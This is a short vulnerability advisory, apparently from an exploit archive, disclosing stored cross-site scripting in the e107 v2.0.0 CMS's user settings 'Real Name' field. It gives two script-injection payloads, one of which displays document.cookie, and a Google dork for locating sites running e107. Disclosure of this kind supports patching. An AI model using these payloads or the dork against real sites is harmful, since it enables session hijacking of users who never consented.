_____ _____ ______
| _ | | _ ||___ /
| |/' |_ __| |_| | / /
| /| \ \/ /\____ | / /
\ |_/ /> < .___/ /./ /
\___//_/\_\\____/ \_/
by bl4ck s3c
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
# Vulnerability Description:
CMS user details section is vulnerable to XSS. You can run XSS payloads.
XSS Vulnerability #1:
Go Update user settings page
"http://{target-url}/usersettings.php"
Set Real Name value;
"><script>alert(String.fromCharCode(88, 83, 83))</script>
or
"><script>alert(document.cookie)</script>
========
Credits:
========
Vulnerability found and advisory written by Ahmet Agar.
===========
References:
===========
http://www.0x97.info
htts://twitter.com/_HacKingZ_